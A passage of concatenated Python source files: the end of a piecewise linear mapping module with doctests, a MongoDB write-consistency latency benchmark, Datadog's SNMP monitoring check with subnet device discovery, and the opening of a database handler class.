        assert p1 == p2, 'first_point and second_point cannot lie on a horizontal or vertical line'
        alpha = 1  # degenerate case: coincident points -> identity mapping
        beta = 0
    else:
        # standard two-point form: slope, then intercept through p1
        alpha = (p2[1] - p1[1]) / (p2[0] - p1[0])
        beta = p1[1] - alpha * p1[0]
    return alpha, beta
def piecewise_linear_mapping(x, knots):
    """
    A piecewise linear mapping function, defined by the boundary points of each segment. For example,
    a function consisting of 3 segments is defined by 4 points. The x-coordinate of each point need to be
    greater that the x-coordinate of the previous point, the y-coordinate needs to be greater or equal.
    The function continues with the same slope for the values below the first point and above the last point.

    INPUT:
    x_in - np.array of values to be mapped
    knots - list of (at least 2) lists with x and y coordinates [[x0, y0], [x1, y1], ...]

    >>> x = np.arange(0.0, 110.0)
    >>> piecewise_linear_mapping(x, [[0, 1], [1, 2], [1, 3]])
    Traceback (most recent call last):
     ...
    AssertionError: The x-coordinate of each point need to be greater that the x-coordinate of the previous point, the y-coordinate needs to be greater or equal.
    >>> piecewise_linear_mapping(x, [[0, 0], []])
    Traceback (most recent call last):
     ...
    AssertionError: Each point needs to have two coordinates [x, y]
    >>> piecewise_linear_mapping(x, [0, 0])
    Traceback (most recent call last):
     ...
    AssertionError: knots needs to be list of lists
    >>> piecewise_linear_mapping(x, [[0, 2], [1, 1]])
    Traceback (most recent call last):
     ...
    AssertionError: The x-coordinate of each point need to be greater that the x-coordinate of the previous point, the y-coordinate needs to be greater or equal.
    >>> knots2160p = [[0.0, -55.0], [95.0, 87.5], [105.0, 105.0], [110.0, 110.0]]
    >>> knots1080p = [[0.0, -36.66], [90.0, 83.04], [95.0, 95.0], [100.0, 100.0]]
    >>> x0 = np.arange(0.0, 95.0, 0.1)
    >>> y0_true = 1.5 * x0 - 55.0
    >>> y0 = piecewise_linear_mapping(x0, knots2160p)
    >>> np.sqrt(np.mean((y0 - y0_true)**2))
    0.0
    >>> x1 = np.arange(0.0, 90.0, 0.1)
    >>> y1_true = 1.33 * x1 - 36.66
    >>> y1 = piecewise_linear_mapping(x1, knots1080p)
    >>> np.sqrt(np.mean((y1 - y1_true) ** 2))
    0.0
    >>> x0 = np.arange(95.0, 105.0, 0.1)
    >>> y0_true = 1.75 * x0 - 78.75
    >>> y0 = piecewise_linear_mapping(x0, knots2160p)
    >>> np.sqrt(np.mean((y0 - y0_true) ** 2))
    0.0
    >>> x1 = np.arange(90.0, 95.0, 0.1)
    >>> y1_true = 2.392 * x1 - 132.24
    >>> y1 = piecewise_linear_mapping(x1, knots1080p)
    >>> np.testing.assert_almost_equal(np.sqrt(np.mean((y1 - y1_true) ** 2)), 0.0)
    >>> x0 = np.arange(105.0, 110.0, 0.1)
    >>> y0 = piecewise_linear_mapping(x0, knots2160p)
    >>> np.sqrt(np.mean((y0 - x0) ** 2))
    0.0
    >>> x1 = np.arange(95.0, 100.0, 0.1)
    >>> y1 = piecewise_linear_mapping(x1, knots1080p)
    >>> np.sqrt(np.mean((y1 - x1) ** 2))
    0.0
    """
    assert len(knots) > 1
    n_seg = len(knots) - 1
    y = np.zeros(np.shape(x))

    # construct the function segment by segment
    for idx in range(n_seg):
        assert isinstance(knots[idx], list) and isinstance(knots[idx + 1], list), \
            'knots needs to be list of lists'
        assert len(knots[idx]) == len(knots[idx + 1]) == 2, \
            'Each point needs to have two coordinates [x, y]'
        assert knots[idx][0] < knots[idx + 1][0] and \
            knots[idx][1] <= knots[idx + 1][1], \
            'The x-coordinate of each point need to be greater that the x-coordinate of the previous point, ' \
            'the y-coordinate needs to be greater or equal.'

        cond0 = knots[idx][0] <= x
        cond1 = x <= knots[idx + 1][0]

        if knots[idx][1] == knots[idx + 1][1]:  # the segment is horizontal
            y[cond0 & cond1] = knots[idx][1]
            # BUG FIX: these were `if`/`elif`, so a mapping with a single
            # segment (n_seg == 1) never extrapolated above the last knot,
            # contradicting the docstring. Independent `if`s keep the same
            # behavior for n_seg > 1 and fix the single-segment case.
            if idx == 0:
                # for points below the defined range
                y[x < knots[idx][0]] = knots[idx][1]
            if idx == n_seg - 1:
                # for points above the defined range
                y[x > knots[idx + 1][0]] = knots[idx][1]
        else:
            slope, offset = find_linear_function_parameters(tuple(knots[idx]),
                                                            tuple(knots[idx + 1]))
            y[cond0 & cond1] = slope * x[cond0 & cond1] + offset
            if idx == 0:
                # for points below the defined range
                y[x < knots[idx][0]] = slope * x[x < knots[idx][0]] + offset
            if idx == n_seg - 1:
                # for points above the defined range
                y[x > knots[idx + 1][0]] = slope * x[x > knots[idx + 1][0]] + offset
    return y
if __name__ == '__main__':
    # Run this module's embedded doctests when invoked as a script.
    import doctest as _doctest
    _doctest.testmod()
|
measure.py | import pymongo
import time
import threading
import argparse
# --- Benchmark configuration ---------------------------------------------
MYDB = "mydatabase"            # MongoDB database name
TABLENAME = "zookeeper"        # collection used by the benchmark workers
STRONG = "[STRONG]"            # label for strongly-consistent workers
WEAK = "[WEAK]"                # label for weakly-consistent workers
strongDict = {"node": "/1", "value": "strong"}  # seed document updated by STRONG workers
weakDict = {"node": "/2", "value": "weak"}      # seed document updated by WEAK workers
CLINUM = 6                     # number of client threads to spawn
hostname = "mongodb://localhost:27017/"  # default connection string (overridden by --host)
stop_event = threading.Event()  # NOTE(review): created but never used below — confirm before removing
def print_table(printDB):
    """Print every document of *printDB* to stdout, framed by separator lines."""
    separator = "=" * 10
    print(separator)
    for document in printDB.find():
        print(document)
    print(separator)
def updateAndGetTime(op, insertDB, insertDict, threadIdx, timeout_, warm_):
    """
    Repeatedly run update_one against *insertDB* and report latency statistics.

    :param op: label printed with the stats (e.g. "[STRONG]" / "[WEAK]")
    :param insertDB: collection-like object exposing update_one(filter, update)
    :param insertDict: filter document selecting the row to update
    :param threadIdx: worker index, only used in the printed report
    :param timeout_: measurement window in seconds (after warm-up)
    :param warm_: warm-up window in seconds; counters are reset when it ends
    """
    count = 0
    totalTime = 0
    timeout = time.time() + timeout_ + warm_
    timeout_warm = time.time() + warm_
    done_warm = False
    while True:
        count += 1
        start = time.time()
        insertDB.update_one(insertDict, {"$set": {"value": count}})
        end = time.time()
        totalTime += (end - start)
        if not done_warm and time.time() > timeout_warm:
            # Warm-up finished: report and reset the counters for the measured run.
            # count is always >= 1 here (incremented at the top of this iteration).
            print("{:8s}\t{}\tcount\t{}\tavg_time\t{:.5f} ms\ttotal_time\t{:.5f} ms\tWarm ".format(
                op, threadIdx, count, totalTime * 1000 / count, totalTime * 1000))
            count = 0
            totalTime = 0
            done_warm = True
        if time.time() > timeout:
            # BUG FIX: when the timeout fires in the same iteration as the
            # warm-up reset, count is 0 and the average would raise
            # ZeroDivisionError; report 0.0 in that case instead.
            avg_ms = totalTime * 1000 / count if count else 0.0
            print("{:8s}\t{}\tcount\t{}\tavg_time\t{:.5f} ms\ttotal_time\t{:.5f} ms\tFinal ".format(
                op, threadIdx, count, avg_ms, totalTime * 1000))
            break
def threadFunction(args):
    """Thread entry point: unpack (op, worker index, parsed options) and run
    the update benchmark against the matching collection."""
    op, threadIdx, opt = args
    if op == STRONG:
        target_col, target_filter = strongCol, {"node": "/1"}
    elif op == WEAK:
        target_col, target_filter = weakCol, {"node": "/2"}
    else:
        return  # unknown label: nothing to do (matches original fall-through)
    updateAndGetTime(op, target_col, target_filter, threadIdx, opt.time, opt.warm_time)
if __name__ == '__main__':
    # Parse benchmark options.
    parser = argparse.ArgumentParser(description='Process some integers.')
    parser.add_argument("--host", help="host ip")
    parser.add_argument("--mode", type=str, default="strong", help="strong weak mix")
    parser.add_argument("--time", type=int, default=60, help="total sec for throughput")
    parser.add_argument("--warm_time", type=int, default=30, help="time for warm up")
    parser.add_argument("--w_mode", type=int, default=1, help="weak mode 1:(w=1, j=False) 2:(w=majority, j=False) 3:(w=1, j=True)")
    opt = parser.parse_args()

    if opt.host:
        hostname = opt.host
    opt.mode = opt.mode.lower()

    # Strong-consistency client: majority write concern with journaling.
    if opt.mode == "strong" or opt.mode == "mix":
        strongClient = pymongo.MongoClient(hostname, w="majority", j=True, maxPoolSize=20)
        strongDB = strongClient[MYDB]
        strongCol = strongDB[TABLENAME]
        strongCol.insert_one(strongDict) # init with /1

    # Weak-consistency client: write concern selected by --w_mode.
    if opt.mode == "weak" or opt.mode == "mix":
        if opt.w_mode == 1:
            print("using setting w=1 j=False")
            weakClient = pymongo.MongoClient(hostname, w=1, j=False, maxPoolSize=20)
        elif opt.w_mode == 2:
            print("using setting w=majority j=False")
            weakClient = pymongo.MongoClient(hostname, w="majority", j=False, maxPoolSize=20)
        elif opt.w_mode == 3:
            print("using setting w=1 j=True")
            weakClient = pymongo.MongoClient(hostname, w=1, j=True, maxPoolSize=20)
        # NOTE(review): any other --w_mode value leaves weakClient undefined
        # and the next line raises NameError — confirm intended.
        weakDB = weakClient[MYDB]
        weakCol = weakDB[TABLENAME]
        weakCol.insert_one(weakDict) # init with /2

    print("done creating client..")

    # Spawn CLINUM worker threads; in "mix" mode alternate strong/weak workers.
    threadList = []
    for i in range(CLINUM):
        if opt.mode == "strong":
            x = threading.Thread(target=threadFunction, args=((STRONG, i, opt),))
            threadList.append(x)
            x.start()
        elif opt.mode == "weak":
            x = threading.Thread(target=threadFunction, args=((WEAK, i, opt),))
            threadList.append(x)
            x.start()
        elif opt.mode == "mix":
            if i % 2 == 0:
                x = threading.Thread(target=threadFunction, args=((STRONG, i, opt),))
                threadList.append(x)
                x.start()
            else:
                x = threading.Thread(target=threadFunction, args=((WEAK, i, opt),))
                threadList.append(x)
                x.start()

    # Wait for the workers (join timeout matches the measurement window).
    for t in threadList:
        t.join(opt.time)

    # see result and delete data
    client = pymongo.MongoClient(hostname)
    # NOTE(review): hard-coded "zookeeper" — presumably should use TABLENAME.
    col = client[MYDB]["zookeeper"]
    print_table(col)
    col.delete_many({"node": "/1"})
    col.delete_many({"node": "/2"})
|
snmp.py | # (C) Datadog, Inc. 2010-2019
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import fnmatch
import ipaddress
import json
import os
import threading
import time
from collections import defaultdict
import pysnmp.proto.rfc1902 as snmp_type
import yaml
from pyasn1.codec.ber import decoder
from pysnmp import hlapi
from pysnmp.error import PySnmpError
from pysnmp.smi import builder
from pysnmp.smi.exval import noSuchInstance, noSuchObject
from six import iteritems
from datadog_checks.base import AgentCheck, ConfigurationError, is_affirmative
from datadog_checks.base.errors import CheckException
from .config import InstanceConfig
try:
    from datadog_checks.base.utils.common import total_time_to_temporal_percent
except ImportError:
    # Provide fallback for agent < 6.16
    def total_time_to_temporal_percent(total_time, scale=1000):
        # Convert an accumulated time (expressed in 1/scale seconds) into a percentage.
        return total_time / scale * 100


try:
    from datadog_agent import get_config, read_persistent_cache, write_persistent_cache
except ImportError:
    # Stubs used when running outside the agent (e.g. in unit tests):
    # no agent config is available and the persistent cache is a no-op.
    def get_config(value):
        return ''

    def write_persistent_cache(value, key):
        pass

    def read_persistent_cache(value):
        return ''
# Additional types that are not part of the SNMP protocol. cf RFC 2856
CounterBasedGauge64, ZeroBasedCounter64 = builder.MibBuilder().importSymbols(
    'HCNUM-TC', 'CounterBasedGauge64', 'ZeroBasedCounter64'
)

# Metric type that we support.
# Class names listed in SNMP_COUNTERS are submitted as rates, those in
# SNMP_GAUGES as gauges (see SnmpCheck.submit_metric).
SNMP_COUNTERS = frozenset([snmp_type.Counter32.__name__, snmp_type.Counter64.__name__, ZeroBasedCounter64.__name__])

SNMP_GAUGES = frozenset(
    [
        snmp_type.Gauge32.__name__,
        snmp_type.Unsigned32.__name__,
        CounterBasedGauge64.__name__,
        snmp_type.Integer.__name__,
        snmp_type.Integer32.__name__,
    ]
)

# Number of OIDs fetched per SNMP request unless overridden in init_config.
DEFAULT_OID_BATCH_SIZE = 10
def reply_invalid(oid):
    """Return True when the var-bind value is a pysnmp "no such instance" /
    "no such object" marker, i.e. the queried OID is absent on the device."""
    markers = (noSuchInstance, noSuchObject)
    return any(marker.isSameTypeWith(oid) for marker in markers)
class SnmpCheck(AgentCheck):
    """Datadog agent check that polls metrics from SNMP devices.

    Supports a single configured device (``ip_address``) or subnet
    auto-discovery (``network_address``), profile resolution through the
    device's sysObjectID, MIB-resolved table metrics and raw-OID metrics.
    """

    SC_STATUS = 'snmp.can_check'  # service-check name for device reachability
    _running = True  # keeps the background discovery loop alive
    _thread = None  # background discovery thread, started lazily from check()
    _NON_REPEATERS = 0  # getBulk parameter: number of non-repeating (scalar) OIDs
    _MAX_REPETITIONS = 25  # getBulk parameter: rows fetched per OID per request

    def __init__(self, name, init_config, instances):
        super(SnmpCheck, self).__init__(name, init_config, instances)

        # Set OID batch size
        self.oid_batch_size = int(init_config.get('oid_batch_size', DEFAULT_OID_BATCH_SIZE))

        # Load Custom MIB directory
        self.mibs_path = init_config.get('mibs_folder')

        self.ignore_nonincreasing_oid = is_affirmative(init_config.get('ignore_nonincreasing_oid', False))

        self.profiles = init_config.get('profiles', {})
        self.profiles_by_oid = {}
        confd = get_config('confd_path')
        for profile, profile_data in self.profiles.items():
            filename = profile_data.get('definition_file')
            if filename:
                # Profile definition lives in a separate YAML file.
                if not os.path.isabs(filename):
                    filename = os.path.join(confd, 'snmp.d', 'profiles', filename)
                try:
                    with open(filename) as f:
                        data = yaml.safe_load(f)
                except Exception:
                    raise ConfigurationError("Couldn't read profile '{}' in '{}'".format(profile, filename))
            else:
                # Inline profile definition.
                data = profile_data['definition']
            self.profiles[profile] = {'definition': data}
            # Index profiles by their sysObjectID pattern for later matching.
            sys_object_oid = data.get('sysobjectid')
            if sys_object_oid:
                self.profiles_by_oid[sys_object_oid] = profile

        self.instance['name'] = self._get_instance_key(self.instance)
        self._config = self._build_config(self.instance)

    def _build_config(self, instance):
        """Build an InstanceConfig for a raw instance dict."""
        return InstanceConfig(
            instance,
            self.warning,
            self.log,
            self.init_config.get('global_metrics', []),
            self.mibs_path,
            self.profiles,
            self.profiles_by_oid,
        )

    def _get_instance_key(self, instance):
        """Return a display name for the instance: explicit name, ip:port, or ip."""
        key = instance.get('name')
        if key:
            return key

        ip = instance.get('ip_address')
        port = instance.get('port')
        if ip and port:
            key = '{host}:{port}'.format(host=ip, port=port)
        else:
            key = ip

        return key

    def discover_instances(self):
        """Background loop scanning the configured subnet for SNMP devices.

        Runs in a daemon thread. Every ``discovery_interval`` seconds it probes
        each host of the network, resolves a profile via sysObjectID, and adds
        responsive hosts to ``config.discovered_instances`` (persisted to the
        agent cache after each addition).
        """
        config = self._config
        discovery_interval = config.instance.get('discovery_interval', 3600)
        while self._running:
            start_time = time.time()
            for host in config.ip_network.hosts():
                host = str(host)
                if host in config.discovered_instances:
                    continue
                instance = config.instance.copy()
                instance.pop('network_address')
                instance['ip_address'] = host
                host_config = self._build_config(instance)
                try:
                    sys_object_oid = self.fetch_sysobject_oid(host_config)
                except Exception as e:
                    # Host not answering SNMP; skip it for this sweep.
                    self.log.debug("Error scanning host %s: %s", host, e)
                    continue
                try:
                    profile = self._profile_for_sysobject_oid(sys_object_oid)
                except ConfigurationError:
                    # No matching profile: only keep the host when explicit
                    # OIDs are configured for the network instance.
                    if not (host_config.table_oids or host_config.raw_oids):
                        self.log.warn("Host %s didn't match a profile for sysObjectID %s", host, sys_object_oid)
                        continue
                else:
                    host_config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
                config.discovered_instances[host] = host_config
                write_persistent_cache(self.check_id, json.dumps(list(config.discovered_instances)))
            # Sleep out the remainder of the interval before the next sweep.
            time_elapsed = time.time() - start_time
            if discovery_interval - time_elapsed > 0:
                time.sleep(discovery_interval - time_elapsed)

    def raise_on_error_indication(self, error_indication, ip_address):
        """Raise CheckException when pysnmp reported a transport-level error."""
        if error_indication:
            message = '{} for instance {}'.format(error_indication, ip_address)
            raise CheckException(message)

    def check_table(self, config, table_oids):
        """
        Perform a snmpwalk on the domain specified by the oids, on the device
        configured in instance.

        Returns a dictionary:
        dict[oid/metric_name][row index] = value
        In case of scalar objects, the row index is just 0
        """
        results = defaultdict(dict)
        enforce_constraints = config.enforce_constraints
        oids = []
        bulk_oids = []
        # Use bulk for SNMP version > 1 and there are enough symbols
        bulk_limit = config.bulk_threshold if config.auth_data.mpModel else 0
        for table, symbols in table_oids.items():
            if not symbols:
                # No table to browse, just one symbol
                oids.append(table)
            elif len(symbols) < bulk_limit:
                oids.extend(symbols)
            else:
                bulk_oids.append(table)

        all_binds, error = self.fetch_oids(config, oids, enforce_constraints=enforce_constraints)
        for oid in bulk_oids:
            try:
                self.log.debug('Running SNMP command getBulk on OID %r', oid)
                binds_iterator = config.call_cmd(
                    hlapi.bulkCmd,
                    self._NON_REPEATERS,
                    self._MAX_REPETITIONS,
                    oid,
                    lookupMib=enforce_constraints,
                    ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
                    lexicographicMode=False,
                )
                binds, error = self._consume_binds_iterator(binds_iterator, config)
                all_binds.extend(binds)
            except PySnmpError as e:
                message = 'Failed to collect some metrics: {}'.format(e)
                if not error:
                    error = message
                self.warning(message)

        for result_oid, value in all_binds:
            if not enforce_constraints:
                # if enforce_constraints is false, then MIB resolution has not been done yet
                # so we need to do it manually. We have to specify the mibs that we will need
                # to resolve the name.
                oid_to_resolve = hlapi.ObjectIdentity(result_oid.asTuple())
                result_oid = oid_to_resolve.resolveWithMib(config.mib_view_controller)

            _, metric, indexes = result_oid.getMibSymbol()
            results[metric][indexes] = value
        self.log.debug('Raw results: %s', results)
        # Freeze the result
        results.default_factory = None
        return results, error

    def check_raw(self, config, oids):
        """
        Perform a snmpwalk on the domain specified by the oids, on the device
        configured in instance.

        Returns a dictionary:
        dict[oid/metric_name] = value
        In case of scalar objects, the row index is just 0
        """
        all_binds, error = self.fetch_oids(config, oids, enforce_constraints=False)
        results = {}
        for result_oid, value in all_binds:
            # Key the result by the dotted-string form of the returned OID.
            oid = result_oid.asTuple()
            matching = '.'.join(str(i) for i in oid)
            results[matching] = value
        self.log.debug('Raw results: %s', results)
        return results, error

    def fetch_oids(self, config, oids, enforce_constraints):
        """Fetch values for *oids* in batches of ``oid_batch_size``.

        Issues snmpget first and falls back to snmpgetnext for OIDs the get
        could not resolve. Returns (all_binds, error_message_or_None).
        """
        # UPDATE: We used to perform only a snmpgetnext command to fetch metric values.
        # It returns the wrong value when the OID passeed is referring to a specific leaf.
        # For example:
        # snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.4.2.1.7.222
        # iso.3.6.1.2.1.25.4.2.1.7.224 = INTEGER: 2
        # SOLUTION: perform a snmpget command and fallback with snmpgetnext if not found
        error = None
        first_oid = 0
        all_binds = []
        while first_oid < len(oids):
            try:
                oids_batch = oids[first_oid : first_oid + self.oid_batch_size]
                self.log.debug('Running SNMP command get on OIDS %s', oids_batch)
                error_indication, error_status, _, var_binds = next(
                    config.call_cmd(hlapi.getCmd, *oids_batch, lookupMib=enforce_constraints)
                )
                self.log.debug('Returned vars: %s', var_binds)

                self.raise_on_error_indication(error_indication, config.ip_address)

                missing_results = []

                for var in var_binds:
                    result_oid, value = var
                    if reply_invalid(value):
                        oid_tuple = result_oid.asTuple()
                        missing_results.append(hlapi.ObjectType(hlapi.ObjectIdentity(oid_tuple)))
                    else:
                        all_binds.append(var)

                if missing_results:
                    # If we didn't catch the metric using snmpget, try snmpnext
                    # Don't walk through the entire MIB, stop at end of table
                    self.log.debug('Running SNMP command getNext on OIDS %s', missing_results)
                    binds_iterator = config.call_cmd(
                        hlapi.nextCmd,
                        *missing_results,
                        lookupMib=enforce_constraints,
                        ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
                        lexicographicMode=False
                    )
                    binds, error = self._consume_binds_iterator(binds_iterator, config)
                    all_binds.extend(binds)

            except PySnmpError as e:
                message = 'Failed to collect some metrics: {}'.format(e)
                if not error:
                    error = message
                self.warning(message)

            # if we fail move onto next batch
            first_oid += self.oid_batch_size

        return all_binds, error

    def fetch_sysobject_oid(self, config):
        """Return the sysObjectID of the instance."""
        # Reference sysObjectID directly, see http://oidref.com/1.3.6.1.2.1.1.2
        oid = hlapi.ObjectType(hlapi.ObjectIdentity((1, 3, 6, 1, 2, 1, 1, 2)))
        self.log.debug('Running SNMP command on OID %r', oid)
        error_indication, _, _, var_binds = next(config.call_cmd(hlapi.nextCmd, oid, lookupMib=False))
        self.raise_on_error_indication(error_indication, config.ip_address)
        self.log.debug('Returned vars: %s', var_binds)
        return var_binds[0][1].prettyPrint()

    def _profile_for_sysobject_oid(self, sys_object_oid):
        """Return, if any, a matching profile for sys_object_oid.

        If several profiles match, it will return the longer match, ie the
        closest one to the sys_object_oid.
        """
        oids = [oid for oid in self.profiles_by_oid if fnmatch.fnmatch(sys_object_oid, oid)]
        oids.sort()
        if not oids:
            raise ConfigurationError('No profile matching sysObjectID {}'.format(sys_object_oid))
        return self.profiles_by_oid[oids[-1]]

    def _consume_binds_iterator(self, binds_iterator, config):
        """Drain a pysnmp command iterator, collecting all var-binds and the
        last error-status message (if any). Returns (all_binds, error)."""
        all_binds = []
        error = None
        for error_indication, error_status, _, var_binds_table in binds_iterator:
            self.log.debug('Returned vars: %s', var_binds_table)

            self.raise_on_error_indication(error_indication, config.ip_address)

            if error_status:
                message = '{} for instance {}'.format(error_status.prettyPrint(), config.ip_address)
                error = message

                # submit CRITICAL service check if we can't connect to device
                if 'unknownUserName' in message:
                    self.log.error(message)
                else:
                    self.warning(message)

            all_binds.extend(var_binds_table)
        return all_binds, error

    def _start_discovery(self):
        """Seed discovered instances from the persistent cache, then start the
        background discovery thread."""
        cache = read_persistent_cache(self.check_id)
        if cache:
            hosts = json.loads(cache)
            for host in hosts:
                try:
                    ipaddress.ip_address(host)
                except ValueError:
                    # Corrupted cache entry: wipe the cache and start fresh.
                    write_persistent_cache(self.check_id, json.dumps([]))
                    break
                instance = self.instance.copy()
                instance.pop('network_address')
                instance['ip_address'] = host
                host_config = self._build_config(instance)
                self._config.discovered_instances[host] = host_config

        self._thread = threading.Thread(target=self.discover_instances, name=self.name)
        self._thread.daemon = True
        self._thread.start()

    def check(self, instance):
        """
        Perform two series of SNMP requests, one for all that have MIB associated
        and should be looked up and one for those specified by oids.
        """
        config = self._config
        if self._config.ip_network:
            # Auto-discovery mode: poll every discovered device on the subnet.
            if self._thread is None:
                self._start_discovery()
            for host, discovered in list(config.discovered_instances.items()):
                if self._check_with_config(discovered):
                    config.failing_instances[host] += 1
                    if config.failing_instances[host] >= config.allowed_failures:
                        # Remove it from discovered instances, we'll re-discover it later if it reappears
                        config.discovered_instances.pop(host)
                        # Reset the failure counter as well
                        config.failing_instances.pop(host)
                else:
                    # Reset the counter if not's failing
                    config.failing_instances.pop(host, None)
            tags = ['network:{}'.format(self._config.ip_network)]
            tags.extend(config.tags)
            self.gauge('snmp.discovered_devices_count', len(config.discovered_instances), tags=tags)
        else:
            self._check_with_config(config)

    def _check_with_config(self, config):
        """Collect and submit metrics for one device. Returns the error string
        (also reported through the service check) or None on success."""
        # Reset errors
        instance = config.instance
        error = table_results = raw_results = None
        try:
            if not (config.table_oids or config.raw_oids):
                # No metrics configured yet: resolve them from the device profile.
                sys_object_oid = self.fetch_sysobject_oid(config)
                profile = self._profile_for_sysobject_oid(sys_object_oid)
                config.refresh_with_profile(self.profiles[profile], self.warning, self.log)

            if config.table_oids:
                self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.table_oids))
                table_results, error = self.check_table(config, config.table_oids)
                self.report_table_metrics(config.metrics, table_results, config.tags)

            if config.raw_oids:
                self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.raw_oids))
                raw_results, error = self.check_raw(config, config.raw_oids)
                self.report_raw_metrics(config.metrics, raw_results, config.tags)
        except CheckException as e:
            error = str(e)
            self.warning(error)
        except Exception as e:
            if not error:
                error = 'Failed to collect metrics for {} - {}'.format(instance['name'], e)
            self.warning(error)
        finally:
            # Report service checks
            sc_tags = ['snmp_device:{}'.format(instance['ip_address'])]
            sc_tags.extend(instance.get('tags', []))
            status = self.OK
            if error:
                status = self.CRITICAL
                if raw_results or table_results:
                    # Partial failure: some metrics were still collected.
                    status = self.WARNING
            self.service_check(self.SC_STATUS, status, tags=sc_tags, message=error)
        return error

    def report_raw_metrics(self, metrics, results, tags):
        """
        For all the metrics that are specified as oid,
        the conf oid is going to exactly match or be a prefix of the oid sent back by the device
        Use the instance configuration to find the name to give to the metric

        Submit the results to the aggregator.
        """
        for metric in metrics:
            if 'OID' in metric:
                forced_type = metric.get('forced_type')
                queried_oid = metric['OID'].lstrip('.')
                if queried_oid in results:
                    value = results[queried_oid]
                else:
                    # Exact match failed: accept the first result whose OID
                    # has the queried OID as prefix.
                    for oid in results:
                        if oid.startswith(queried_oid):
                            value = results[oid]
                            break
                    else:
                        self.log.warning('No matching results found for oid %s', queried_oid)
                        continue
                name = metric.get('name', 'unnamed_metric')
                metric_tags = tags
                if metric.get('metric_tags'):
                    metric_tags = metric_tags + metric.get('metric_tags')
                self.submit_metric(name, value, forced_type, metric_tags)

    def report_table_metrics(self, metrics, results, tags):
        """
        For each of the metrics specified as needing to be resolved with mib,
        gather the tags requested in the instance conf for each row.

        Submit the results to the aggregator.
        """
        for metric in metrics:
            forced_type = metric.get('forced_type')
            if 'table' in metric:
                index_based_tags = []
                column_based_tags = []
                for metric_tag in metric.get('metric_tags', []):
                    tag_key = metric_tag['tag']
                    if 'index' in metric_tag:
                        index_based_tags.append((tag_key, metric_tag.get('index')))
                    elif 'column' in metric_tag:
                        column_based_tags.append((tag_key, metric_tag.get('column')))
                    else:
                        self.log.warning('No indication on what value to use for this tag')

                for value_to_collect in metric.get('symbols', []):
                    if value_to_collect not in results:
                        self.log.debug('Ignoring metric %s from table %s', value_to_collect, metric['table'])
                        continue
                    for index, val in iteritems(results[value_to_collect]):
                        metric_tags = tags + self.get_index_tags(index, results, index_based_tags, column_based_tags)
                        self.submit_metric(value_to_collect, val, forced_type, metric_tags)

            elif 'symbol' in metric:
                name = metric['symbol']
                if name not in results:
                    self.log.debug('Ignoring metric %s', name)
                    continue
                result = list(results[name].items())
                if len(result) > 1:
                    self.log.warning('Several rows corresponding while the metric is supposed to be a scalar')
                    continue
                val = result[0][1]
                metric_tags = tags + metric.get('metric_tags', [])
                self.submit_metric(name, val, forced_type, metric_tags)
            elif 'OID' in metric:
                pass  # This one is already handled by the other batch of requests
            else:
                raise ConfigurationError('Unsupported metric in config file: {}'.format(metric))

    def get_index_tags(self, index, results, index_tags, column_tags):
        """
        Gather the tags for this row of the table (index) based on the
        results (all the results from the query).
        index_tags and column_tags are the tags to gather.
         - Those specified in index_tags contain the tag_group name and the
           index of the value we want to extract from the index tuple.
           cf. 1 for ipVersion in the IP-MIB::ipSystemStatsTable for example
         - Those specified in column_tags contain the name of a column, which
           could be a potential result, to use as a tag
           cf. ifDescr in the IF-MIB::ifTable for example
        """
        tags = []
        for idx_tag in index_tags:
            tag_group = idx_tag[0]
            try:
                # Configured index positions are 1-based.
                tag_value = index[idx_tag[1] - 1].prettyPrint()
            except IndexError:
                self.log.warning('Not enough indexes, skipping this tag')
                continue
            tags.append('{}:{}'.format(tag_group, tag_value))
        for col_tag in column_tags:
            tag_group = col_tag[0]
            try:
                tag_value = results[col_tag[1]][index]
            except KeyError:
                self.log.warning('Column %s not present in the table, skipping this tag', col_tag[1])
                continue
            if reply_invalid(tag_value):
                self.log.warning("Can't deduct tag from column for tag %s", tag_group)
                continue
            tag_value = tag_value.prettyPrint()
            tags.append('{}:{}'.format(tag_group, tag_value))
        return tags

    def submit_metric(self, name, snmp_value, forced_type, tags=None):
        """
        Convert the values reported as pysnmp-Managed Objects to values and
        report them to the aggregator.
        """
        tags = [] if tags is None else tags
        if reply_invalid(snmp_value):
            # Metrics not present in the queried object
            self.log.warning('No such Mib available: %s', name)
            return

        metric_name = self.normalize(name, prefix='snmp')

        # A forced type from the configuration overrides type inference.
        if forced_type:
            if forced_type.lower() == 'gauge':
                value = int(snmp_value)
                self.gauge(metric_name, value, tags)
            elif forced_type.lower() == 'percent':
                value = total_time_to_temporal_percent(int(snmp_value), scale=1)
                self.rate(metric_name, value, tags)
            elif forced_type.lower() == 'counter':
                value = int(snmp_value)
                self.rate(metric_name, value, tags)
            elif forced_type.lower() == 'monotonic_count':
                value = int(snmp_value)
                self.monotonic_count(metric_name, value, tags)
            else:
                self.warning('Invalid forced-type specified: {} in {}'.format(forced_type, name))
                raise ConfigurationError('Invalid forced-type in config file: {}'.format(name))
            return

        # Ugly hack but couldn't find a cleaner way
        # Proper way would be to use the ASN1 method isSameTypeWith but it
        # wrongfully returns True in the case of CounterBasedGauge64
        # and Counter64 for example
        snmp_class = snmp_value.__class__.__name__
        if snmp_class in SNMP_COUNTERS:
            value = int(snmp_value)
            self.rate(metric_name, value, tags)
            return
        if snmp_class in SNMP_GAUGES:
            value = int(snmp_value)
            self.gauge(metric_name, value, tags)
            return

        if snmp_class == 'Opaque':
            # Try support for floats
            try:
                value = float(decoder.decode(bytes(snmp_value))[0])
            except Exception:
                pass
            else:
                self.gauge(metric_name, value, tags)
                return

        # Falls back to try to cast the value.
        try:
            value = float(snmp_value)
        except ValueError:
            pass
        else:
            self.gauge(metric_name, value, tags)
            return

        self.log.warning('Unsupported metric type %s for %s', snmp_class, metric_name)
|
dbhandler.py | import time
import logging
import threading
from CredentialDatabase.db.connector import DBConnector
from CredentialDatabase.db.creator import DBCreator
from CredentialDatabase.db.fetcher import DBFetcher
from CredentialDatabase.db.inserter import DBInserter
from CredentialDatabase.utils.password import Password
from CredentialDatabase.exceptions import DBIntegrityError
class DBHandler:
""" class DBHandler to provide database actions to subclasses
USAGE:
dbhandler = DBHandler()
"""
def __init__(self, password_db, db_entries_logger=1000, **dbparams):
self.logger = logging.getLogger('CredentialDatabase')
self.logger.info('create class DBHandler')
